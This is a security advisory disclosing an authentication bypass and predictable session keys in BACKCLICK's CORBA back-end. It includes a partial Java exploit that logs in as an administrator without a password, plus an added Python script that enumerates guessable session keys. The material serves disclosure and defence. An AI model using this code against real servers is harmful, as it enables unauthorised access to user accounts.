-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-035
Product: BACKCLICK
Manufacturer: BACKCLICK GmbH
Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type: CWE-288: Authentication Bypass Using an Alternate Path or Channel
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure: 2022-11-14
CVE Reference: CVE-2022-44001
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the creation
of newsletters. The German manufacturer describes the product as follows
(see [1], translated from German):

"BACKCLICK is a web-based enterprise e-mail marketing solution and
newsletter software with which you can create online e-mail campaigns and
newsletters and send them to your customers."

User authentication for accessing the CORBA back-end services can be
bypassed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The primary BCServer CORBA back-end service manages sessions through
"api_object" objects. Normally, such an object is obtained by calling the
"login" method of the login factory with valid user credentials.

However, the login factory also exposes a "relogin" method that skips the
password check. Calling that method yields a session object for any user.
Alternatively, the "setupMandatorSwitch" method can be called first, which
also disables the password check for the next "login" call for the
specified user ID.

Therefore, anyone who can reach the back-end CORBA service can perform
application actions posing as an arbitrary user, without knowing any
password.

Furthermore, the object keys, and therefore the CORBA IORs, of the user
session objects do not appear to be sufficiently randomized and could be
guessed by an attacker. A guessed object key is sufficient to access the
corresponding session object via CORBA.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following exploit code was implemented using the JacORB CORBA client
library. It obtains a reference to the BCServer login factory object and
bypasses authentication by calling either the "relogin" method or the
"setupMandatorSwitch" method followed by a regular "login". Both variants
yield a valid "api_object" session. The code is an excerpt: the IDL stubs
(login_factory, login_factoryHelper) are generated from the BACKCLICK IDL,
and the helpers NamingContextConnection and getPatchedObject as well as
the variables name, host and port are not included here.

- -----
import java.util.Properties;
import org.omg.CORBA.ORB;
import org.omg.CORBA.Object;
import org.omg.CosNaming.NamingContextExt;

System.setProperty("org.omg.CORBA.ORBClass", "org.jacorb.orb.ORB");
System.setProperty("org.omg.CORBA.ORBSingletonClass", "org.jacorb.orb.ORBSingleton");
Properties props = new Properties();
// target host omitted here; the naming service listened on port 2222
String corbaloc = "corbaloc::" + "" + ":" + 2222 + "/StandardNS/NameServer-POA/_root";
props.setProperty("ORBInitRef.NameService", corbaloc);
ORB o = ORB.init((String[])args, props);
NamingContextConnection namingContextConnection = new NamingContextConnection(o);
NamingContextExt namingContext = namingContextConnection.getNamingContext();
Object obj = namingContext.resolve(namingContext.to_name(name));
// the IOR returned by NameServer in our case did not contain the appropriate
// network address and needed to be adjusted
Object ior = getPatchedObject(o, "Backclick", host, port);
login_factory lf = login_factoryHelper.narrow(ior);
// relogin hands out a session without verifying the password argument
Object apiRef = lf.relogin("bcadmin", "doesnotmatter", "", "xyz", "1.2.3.5");
// alternative variant: setupMandatorSwitch disables the password check
// for the next login call of the given user ID
lf.setupMandatorSwitch(1,0);
apiRef = lf.login("bcadmin", "doesnotmatter", "", "foo", "1.2.3.4");
- -----

The object keys of the "api_object" session objects of three different,
legitimately authenticated users were, for example, as follows:

- -----
9803807542/%15%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B
9803807542/%17%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B
9803807542/%0D%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B
- -----

The keys differ only in a single byte.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution. Until a fix is available, network access to
the BCServer CORBA back-end (port 2222 in the tested setup) should be
restricted to the hosts that legitimately need it, since the bypass only
requires reachability of that service.
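The three object keys listed in the PoC section can be compared byte by byte to make the "not sufficiently randomized" claim concrete. The following Python script is an added example written for this edited version; it is not part of the original advisory and not BACKCLICK or SySS code. It percent-decodes the keys, reports which byte offsets of the per-session object id actually vary, estimates the resulting candidate space, and enumerates every key that agrees with the samples on the constant bytes. The interpretation that the part before the first "/" is a constant prefix and the remainder the per-session object id is an assumption based on the three samples only; the real key generator is not known.

```python
from itertools import product
from urllib.parse import quote, unquote_to_bytes

# The three "api_object" object keys quoted in the advisory's PoC section,
# exactly as displayed (percent-encoded). Each belongs to a different,
# legitimately authenticated user.
OBSERVED_KEYS = [
    "9803807542/%15%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B",
    "9803807542/%17%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B",
    "9803807542/%0D%06%258A%03%1EJ%1F%0F%10%060F8%14%14%1BHL%1B",
]


def decode_key(key: str) -> tuple[bytes, bytes]:
    """Split a key into the part before the first '/' (assumed constant) and
    the percent-decoded remainder (assumed to be the per-session object id)."""
    prefix, _, body = key.partition("/")
    return prefix.encode("ascii"), unquote_to_bytes(body)


def encode_key(prefix: bytes, body: bytes) -> str:
    """Inverse of decode_key. safe='' makes a literal '%' come out as %25,
    matching the encoding shown in the advisory."""
    return prefix.decode("ascii") + "/" + quote(body, safe="")


def varying_positions(keys: list[str]) -> list[int]:
    """Byte offsets within the object id that differ across the samples."""
    bodies = [decode_key(k)[1] for k in keys]
    if len({len(b) for b in bodies}) != 1:
        raise ValueError("object ids have different lengths")
    return [i for i in range(len(bodies[0])) if len({b[i] for b in bodies}) > 1]


def search_space(keys: list[str]) -> int:
    """Upper bound on the candidate count if only the varying bytes carry
    entropy: 256 possibilities per varying byte."""
    return 256 ** len(varying_positions(keys))


def candidate_keys(keys: list[str], limit: int = 1 << 16) -> list[str]:
    """Every key that equals the samples on the constant bytes and takes any
    value on the varying bytes. Refuses to enumerate more than `limit` keys."""
    if search_space(keys) > limit:
        raise ValueError("too many varying bytes to enumerate")
    prefix, template = decode_key(keys[0])
    positions = varying_positions(keys)
    out = []
    for values in product(range(256), repeat=len(positions)):
        body = bytearray(template)
        for pos, val in zip(positions, values):
            body[pos] = val
        out.append(encode_key(prefix, bytes(body)))
    return out


if __name__ == "__main__":
    prefix, body = decode_key(OBSERVED_KEYS[0])
    print("constant prefix:", prefix.decode())
    print("object id length:", len(body))
    print("varying byte offsets:", varying_positions(OBSERVED_KEYS))
    print("candidate space:", search_space(OBSERVED_KEYS))
```

With the three published samples the script reports a 21-byte object id in which only offset 0 varies (0x15, 0x17, 0x0D), so an attacker who has seen one key needs at most 256 guesses to enumerate the neighbouring session keys. Two caveats: three samples cannot show whether the other bytes vary over time or across server restarts, and turning a candidate key into a usable reference still requires building an IOR or corbaloc URL for it and issuing a CORBA request, which this script deliberately does not do.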
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of
            vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-035
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-035.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl
PdpDGgf+Kj3FrE3YWFK6qEnAU831kiP3GBHBZ3h78RCop8jZ54jM03CLlfFvM7u+
ZVtlbqxjVC9b8OwW+lxe0PDp+DoKNy84KMGgoeBwYn8wRNE6kxFe+DROB3r+LooB
MCvt7z53D/R6U29kJhmUjY/ZWqd/so35ehngEV/Z1Rl+Gmj41v61rEszIYBXgBiA
VnbvPFYPKztsK0eE2OIoWb6Q7Yi+h2hED4qD96Y+2VbQUhY/v97bdsmi5YGpohOh
pIqttevPZHHhvNdVDAvFt5lFKcZvKOcLbwcg7dPsQM25sKCf12I/p1OJjvWpFm1i
kIzrt28JS3FvdvdQ+EGDOul1bVOgEg==
=sQFz
-----END PGP SIGNATURE-----